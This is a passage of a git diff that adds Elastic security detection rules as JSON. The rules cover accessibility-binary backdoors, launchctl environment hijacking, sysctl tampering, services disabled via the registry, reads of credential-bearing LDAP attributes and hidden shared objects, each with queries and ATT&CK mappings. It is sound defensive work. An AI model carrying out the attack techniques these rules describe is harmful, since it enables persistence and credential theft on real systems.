"^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111.json new file mode 100644 index 00000000000..dfc692efa64 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Modification of Accessibility Binaries", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.pe.original_file_name : \"?*\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", + "references": [ + "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106.json new file mode 100644 index 00000000000..4790539e787 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to an environment variable using the built-in launchctl command. Adversaries may execute their own malicious payloads by hijacking certain environment variables to load arbitrary libraries or bypass certain restrictions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of Environment Variable via Launchctl", + "query": "event.category:process and host.os.type:macos and event.type:start and \n process.name:launchctl and \n process.args:(setenv and not (ANT_HOME or \n DBUS_LAUNCHD_SESSION_BUS_SOCKET or \n EDEN_ENV or \n LG_WEBOS_TV_SDK_HOME or \n RUNTIME_JAVA_HOME or \n WEBOS_CLI_TV or \n JAVA*_HOME) and \n not *.vmoptions) and \n not process.parent.executable:(\"/Applications/IntelliJ IDEA CE.app/Contents/jbr/Contents/Home/lib/jspawnhelper\" or \n /Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin or \n /Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin or \n /usr/local/bin/kr)\n", + "references": [ + "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/escalate/tccbypass.rb" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_106.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_106.json new file mode 100644 index 00000000000..ee25b01c833 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_106.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security.", + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Sysctl File Event", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:linux and event.category:file and event.action:(\"opened-file\" or \"read-file\" or \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\" or \"/etc/sysctl.d\" or /etc/sysctl.d/*) and\nnot process.name:(dpkg or dockerd or unattended-upg)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 106 + }, + "id": "7592c127-89fb-4209-a8f6-f9944dfd7e02_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_107.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_107.json new file mode 100644 index 00000000000..de8011a6e1c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_107.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security.", + "from": "now-119m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Sysctl File Event", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:(\"opened-file\" or \"read-file\" or \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\" or \"/etc/sysctl.d\" or /etc/sysctl.d/*) and not process.name:(\n dpkg or dockerd or unattended-upg or systemd-sysctl or python* or auditbeat or dpkg or grep or pool*\n)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 107 + }, + "id": "7592c127-89fb-4209-a8f6-f9944dfd7e02_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_2.json b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_2.json new file mode 100644 index 00000000000..e4545254534 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_2.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies attempts to modify services start settings using processes other than services.exe. Attackers may attempt to modify security and monitoring services to avoid detection or delay response.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Service Disabled via Registry Modification", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\"\n ) and registry.data.strings : (\"3\", \"4\") and\n not \n (\n process.name : \"services.exe\" and user.id : \"S-1-5-18\"\n )\n and not registry.path : \"HKLM\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\MrxSmb10\\\\Start\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "75dcb176-a575-4e33-a020-4a52aaa1b593", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "75dcb176-a575-4e33-a020-4a52aaa1b593_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10.json new file mode 100644 index 00000000000..ddb009c9d9a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Access to a Sensitive LDAP Attribute", + "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", + "references": [ + "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", + "https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 10 + }, + "id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_109.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_109.json new file mode 100644 index 00000000000..a846adbdcc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_109.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + 